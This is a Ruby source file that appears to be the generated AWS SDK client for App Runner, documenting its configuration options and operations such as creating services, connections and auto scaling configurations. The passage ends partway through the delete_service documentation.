require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/json_rpc.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:apprunner)
module Aws::AppRunner
# An API client for AppRunner. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::AppRunner::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
# Enables response stubbing via `stub_responses: true` (see ClientStubs).
include Aws::ClientStubs
# Service identifier used by Aws::Plugins::GlobalConfiguration lookups.
@identifier = :apprunner
# Bind the generated API model (shapes/operations) to this client class.
set_api(ClientApi::API)
# Register the standard AWS SDK middleware pipeline. Order matters:
# plugins are applied in registration order when handlers are built.
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
# Request signing (SigV4) and the JSON-RPC protocol binding come last.
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::JsonRpc)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::SharedCredentials` - Used for loading static credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# * `Aws::AssumeRoleWebIdentityCredentials` - Used when you need to
# assume a role after providing credentials via the web.
#
# * `Aws::SSOCredentials` - Used for loading credentials from AWS SSO using an
# access token generated from `aws login`.
#
# * `Aws::ProcessCredentials` - Used for loading credentials from a
# process that outputs to stdout.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::ECSCredentials` - Used for loading credentials from
# instances running in ECS.
#
# * `Aws::CognitoIdentityCredentials` - Used for loading credentials
# from the Cognito Identity service.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2/ECS IMDS instance profile - When used by default, the timeouts
# are very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentials` or `Aws::ECSCredentials` to
# enable retries and extended timeouts.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficient client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :simple_json (false)
# Disables request parameter conversion, validation, and formatting.
# Also disable response data type conversions. This option is useful
# when you want to ensure the highest level of performance by
# avoiding overhead of walking request parameters and response data
# structures.
#
# When `:simple_json` is enabled, the request parameters hash must
# be formatted exactly as the DynamoDB API expects.
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Integer] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the
# system default will be used if available.
#
# Constructs the client. All option handling (credentials, region,
# retries, etc. — see the @option docs above) is performed by the
# plugin chain registered on this class, so the constructor simply
# forwards every argument (and any block) to Seahorse::Client::Base.
def initialize(*args)
  super
end
# @!group API Operations
# Associate your own domain name with the AWS App Runner subdomain URL
# of your App Runner service.
#
# After you call `AssociateCustomDomain` and receive a successful
# response, use the information in the CustomDomain record that's
# returned to add CNAME records to your Domain Name System (DNS). For
# each mapped domain name, add a mapping to the target App Runner
# subdomain and one or more certificate validation records. App Runner
# then performs DNS validation to verify that you own or control the
# domain name that you associated. App Runner tracks domain validity in
# a certificate stored in [AWS Certificate Manager (ACM)][1].
#
#
#
# [1]: https://docs.aws.amazon.com/acm/latest/userguide
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to associate a custom domain name with.
#
# @option params [required, String] :domain_name
# A custom domain endpoint to associate. Specify a root domain (for
# example, `example.com`), a subdomain (for example, `login.example.com`
# or `admin.login.example.com`), or a wildcard (for example,
# `*.example.com`).
#
# @option params [Boolean] :enable_www_subdomain
# Set to `true` to associate the subdomain `www.DomainName ` with the
# App Runner service in addition to the base domain.
#
# Default: `true`
#
# @return [Types::AssociateCustomDomainResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::AssociateCustomDomainResponse#dns_target #dns_target} => String
# * {Types::AssociateCustomDomainResponse#service_arn #service_arn} => String
# * {Types::AssociateCustomDomainResponse#custom_domain #custom_domain} => Types::CustomDomain
#
# @example Request syntax with placeholder values
#
# resp = client.associate_custom_domain({
# service_arn: "AppRunnerResourceArn", # required
# domain_name: "DomainName", # required
# enable_www_subdomain: false,
# })
#
# @example Response structure
#
# resp.dns_target #=> String
# resp.service_arn #=> String
# resp.custom_domain.domain_name #=> String
# resp.custom_domain.enable_www_subdomain #=> Boolean
# resp.custom_domain.certificate_validation_records #=> Array
# resp.custom_domain.certificate_validation_records[0].name #=> String
# resp.custom_domain.certificate_validation_records[0].type #=> String
# resp.custom_domain.certificate_validation_records[0].value #=> String
# resp.custom_domain.certificate_validation_records[0].status #=> String, one of "PENDING_VALIDATION", "SUCCESS", "FAILED"
# resp.custom_domain.status #=> String, one of "CREATING", "CREATE_FAILED", "ACTIVE", "DELETING", "DELETE_FAILED", "PENDING_CERTIFICATE_DNS_VALIDATION", "BINDING_CERTIFICATE"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/AssociateCustomDomain AWS API Documentation
#
# @overload associate_custom_domain(params = {})
# @param [Hash] params ({})
def associate_custom_domain(params = {}, options = {})
  # Assemble the operation request and dispatch it in one step,
  # returning the Seahorse::Client::Response.
  build_request(:associate_custom_domain, params).send_request(options)
end
# Create an AWS App Runner automatic scaling configuration resource. App
# Runner requires this resource when you create App Runner services that
# require non-default auto scaling settings. You can share an auto
# scaling configuration across multiple services.
#
# Create multiple revisions of a configuration by using the same
# `AutoScalingConfigurationName` and different
# `AutoScalingConfigurationRevision` values. When you create a service,
# you can set it to use the latest active revision of an auto scaling
# configuration or a specific revision.
#
# Configure a higher `MinSize` to increase the spread of your App Runner
# service over more Availability Zones in the AWS Region. The tradeoff
# is a higher minimal cost.
#
# Configure a lower `MaxSize` to control your cost. The tradeoff is
# lower responsiveness during peak demand.
#
# @option params [required, String] :auto_scaling_configuration_name
# A name for the auto scaling configuration. When you use it for the
# first time in an AWS Region, App Runner creates revision number `1` of
# this name. When you use the same name in subsequent calls, App Runner
# creates incremental revisions of the configuration.
#
# @option params [Integer] :max_concurrency
# The maximum number of concurrent requests that you want an instance to
# process. If the number of concurrent requests exceeds this limit, App
# Runner scales up your service.
#
# Default: `100`
#
# @option params [Integer] :min_size
# The minimum number of instances that App Runner provisions for your
# service. The service always has at least `MinSize` provisioned
# instances. Some of them actively serve traffic. The rest of them
# (provisioned and inactive instances) are a cost-effective compute
# capacity reserve and are ready to be quickly activated. You pay for
# memory usage of all the provisioned instances. You pay for CPU usage
# of only the active subset.
#
# App Runner temporarily doubles the number of provisioned instances
# during deployments, to maintain the same capacity for both old and new
# code.
#
# Default: `1`
#
# @option params [Integer] :max_size
# The maximum number of instances that your service scales up to. At
# most `MaxSize` instances actively serve traffic for your service.
#
# Default: `25`
#
# @option params [Array<Types::Tag>] :tags
# A list of metadata items that you can associate with your auto scaling
# configuration resource. A tag is a key-value pair.
#
# @return [Types::CreateAutoScalingConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateAutoScalingConfigurationResponse#auto_scaling_configuration #auto_scaling_configuration} => Types::AutoScalingConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.create_auto_scaling_configuration({
# auto_scaling_configuration_name: "AutoScalingConfigurationName", # required
# max_concurrency: 1,
# min_size: 1,
# max_size: 1,
# tags: [
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# })
#
# @example Response structure
#
# resp.auto_scaling_configuration.auto_scaling_configuration_arn #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_name #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_revision #=> Integer
# resp.auto_scaling_configuration.latest #=> Boolean
# resp.auto_scaling_configuration.status #=> String, one of "ACTIVE", "INACTIVE"
# resp.auto_scaling_configuration.max_concurrency #=> Integer
# resp.auto_scaling_configuration.min_size #=> Integer
# resp.auto_scaling_configuration.max_size #=> Integer
# resp.auto_scaling_configuration.created_at #=> Time
# resp.auto_scaling_configuration.deleted_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/CreateAutoScalingConfiguration AWS API Documentation
#
# @overload create_auto_scaling_configuration(params = {})
# @param [Hash] params ({})
def create_auto_scaling_configuration(params = {}, options = {})
  # Assemble the operation request and dispatch it in one step,
  # returning the Seahorse::Client::Response.
  build_request(:create_auto_scaling_configuration, params).send_request(options)
end
# Create an AWS App Runner connection resource. App Runner requires a
# connection resource when you create App Runner services that access
# private repositories from certain third-party providers. You can share
# a connection across multiple services.
#
# A connection resource is needed to access GitHub repositories. GitHub
# requires a user interface approval process through the App Runner
# console before you can use the connection.
#
# @option params [required, String] :connection_name
# A name for the new connection. It must be unique across all App Runner
# connections for the AWS account in the AWS Region.
#
# @option params [required, String] :provider_type
# The source repository provider.
#
# @option params [Array<Types::Tag>] :tags
# A list of metadata items that you can associate with your connection
# resource. A tag is a key-value pair.
#
# @return [Types::CreateConnectionResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateConnectionResponse#connection #connection} => Types::Connection
#
# @example Request syntax with placeholder values
#
# resp = client.create_connection({
# connection_name: "ConnectionName", # required
# provider_type: "GITHUB", # required, accepts GITHUB
# tags: [
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# })
#
# @example Response structure
#
# resp.connection.connection_name #=> String
# resp.connection.connection_arn #=> String
# resp.connection.provider_type #=> String, one of "GITHUB"
# resp.connection.status #=> String, one of "PENDING_HANDSHAKE", "AVAILABLE", "ERROR", "DELETED"
# resp.connection.created_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/CreateConnection AWS API Documentation
#
# @overload create_connection(params = {})
# @param [Hash] params ({})
def create_connection(params = {}, options = {})
  # Assemble the operation request and dispatch it in one step,
  # returning the Seahorse::Client::Response.
  build_request(:create_connection, params).send_request(options)
end
# Create an AWS App Runner service. After the service is created, the
# action also automatically starts a deployment.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the [ListOperations][1] call to track
# the operation's progress.
#
#
#
# [1]: https://docs.aws.amazon.com/apprunner/latest/api/API_ListOperations.html
#
# @option params [required, String] :service_name
# A name for the new service. It must be unique across all the running
# App Runner services in your AWS account in the AWS Region.
#
# @option params [required, Types::SourceConfiguration] :source_configuration
# The source to deploy to the App Runner service. It can be a code or an
# image repository.
#
# @option params [Types::InstanceConfiguration] :instance_configuration
# The runtime configuration of instances (scaling units) of the App
# Runner service.
#
# @option params [Array<Types::Tag>] :tags
# An optional list of metadata items that you can associate with your
# service resource. A tag is a key-value pair.
#
# @option params [Types::EncryptionConfiguration] :encryption_configuration
# An optional custom encryption key that App Runner uses to encrypt the
# copy of your source repository that it maintains and your service
# logs. By default, App Runner uses an AWS managed CMK.
#
# @option params [Types::HealthCheckConfiguration] :health_check_configuration
# The settings for the health check that AWS App Runner performs to
# monitor the health of your service.
#
# @option params [String] :auto_scaling_configuration_arn
# The Amazon Resource Name (ARN) of an App Runner automatic scaling
# configuration resource that you want to associate with your service.
# If not provided, App Runner associates the latest revision of a
# default auto scaling configuration.
#
# @return [Types::CreateServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateServiceResponse#service #service} => Types::Service
# * {Types::CreateServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_service({
# service_name: "ServiceName", # required
# source_configuration: { # required
# code_repository: {
# repository_url: "String", # required
# source_code_version: { # required
# type: "BRANCH", # required, accepts BRANCH
# value: "String", # required
# },
# code_configuration: {
# configuration_source: "REPOSITORY", # required, accepts REPOSITORY, API
# code_configuration_values: {
# runtime: "PYTHON_3", # required, accepts PYTHON_3, NODEJS_12
# build_command: "BuildCommand",
# start_command: "StartCommand",
# port: "String",
# runtime_environment_variables: {
# "RuntimeEnvironmentVariablesKey" => "RuntimeEnvironmentVariablesValue",
# },
# },
# },
# },
# image_repository: {
# image_identifier: "ImageIdentifier", # required
# image_configuration: {
# runtime_environment_variables: {
# "RuntimeEnvironmentVariablesKey" => "RuntimeEnvironmentVariablesValue",
# },
# start_command: "String",
# port: "String",
# },
# image_repository_type: "ECR", # required, accepts ECR, ECR_PUBLIC
# },
# auto_deployments_enabled: false,
# authentication_configuration: {
# connection_arn: "AppRunnerResourceArn",
# access_role_arn: "RoleArn",
# },
# },
# instance_configuration: {
# cpu: "Cpu",
# memory: "Memory",
# instance_role_arn: "RoleArn",
# },
# tags: [
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# encryption_configuration: {
# kms_key: "KmsKeyArn", # required
# },
# health_check_configuration: {
# protocol: "TCP", # accepts TCP, HTTP
# path: "String",
# interval: 1,
# timeout: 1,
# healthy_threshold: 1,
# unhealthy_threshold: 1,
# },
# auto_scaling_configuration_arn: "AppRunnerResourceArn",
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/CreateService AWS API Documentation
#
# @overload create_service(params = {})
# @param [Hash] params ({})
def create_service(params = {}, options = {})
  # Assemble the operation request and dispatch it in one step,
  # returning the Seahorse::Client::Response.
  build_request(:create_service, params).send_request(options)
end
# Delete an AWS App Runner automatic scaling configuration resource. You
# can delete a specific revision or the latest active revision. You
# can't delete a configuration that's used by one or more App Runner
# services.
#
# @option params [required, String] :auto_scaling_configuration_arn
# The Amazon Resource Name (ARN) of the App Runner auto scaling
# configuration that you want to delete.
#
# The ARN can be a full auto scaling configuration ARN, or a partial ARN
# ending with either `.../name ` or `.../name/revision `. If a revision
# isn't specified, the latest active revision is deleted.
#
# @return [Types::DeleteAutoScalingConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteAutoScalingConfigurationResponse#auto_scaling_configuration #auto_scaling_configuration} => Types::AutoScalingConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.delete_auto_scaling_configuration({
# auto_scaling_configuration_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.auto_scaling_configuration.auto_scaling_configuration_arn #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_name #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_revision #=> Integer
# resp.auto_scaling_configuration.latest #=> Boolean
# resp.auto_scaling_configuration.status #=> String, one of "ACTIVE", "INACTIVE"
# resp.auto_scaling_configuration.max_concurrency #=> Integer
# resp.auto_scaling_configuration.min_size #=> Integer
# resp.auto_scaling_configuration.max_size #=> Integer
# resp.auto_scaling_configuration.created_at #=> Time
# resp.auto_scaling_configuration.deleted_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DeleteAutoScalingConfiguration AWS API Documentation
#
# @overload delete_auto_scaling_configuration(params = {})
# @param [Hash] params ({})
def delete_auto_scaling_configuration(params = {}, options = {})
  # Assemble the operation request and dispatch it in one step,
  # returning the Seahorse::Client::Response.
  build_request(:delete_auto_scaling_configuration, params).send_request(options)
end
# Delete an AWS App Runner connection. You must first ensure that there
# are no running App Runner services that use this connection. If there
# are any, the `DeleteConnection` action fails.
#
# @option params [required, String] :connection_arn
# The Amazon Resource Name (ARN) of the App Runner connection that you
# want to delete.
#
# @return [Types::DeleteConnectionResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteConnectionResponse#connection #connection} => Types::Connection
#
# @example Request syntax with placeholder values
#
# resp = client.delete_connection({
# connection_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.connection.connection_name #=> String
# resp.connection.connection_arn #=> String
# resp.connection.provider_type #=> String, one of "GITHUB"
# resp.connection.status #=> String, one of "PENDING_HANDSHAKE", "AVAILABLE", "ERROR", "DELETED"
# resp.connection.created_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DeleteConnection AWS API Documentation
#
# @overload delete_connection(params = {})
# @param [Hash] params ({})
def delete_connection(params = {}, options = {})
req = build_request(:delete_connection, params)
req.send_request(options)
end
# Delete an AWS App Runner service.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to delete.
#
# @return [Types::DeleteServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteServiceResponse#service #service} => Types::Service
# * {Types::DeleteServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.delete_service({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
